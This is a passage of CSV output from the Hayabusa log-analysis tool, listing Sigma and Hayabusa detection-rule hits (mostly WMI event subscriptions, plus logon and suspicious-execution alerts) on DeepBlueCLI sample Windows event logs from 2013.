Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:46:57.850 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:48:29.225 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:48:29.850 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
-2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:58:14.879 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:32:03.644 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:35:43.160 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:37:00.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:41:07.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:44:49.144 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:33.988 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:57:47.863 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:00:03.457 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:02:44.129 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:02:44.129 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing 
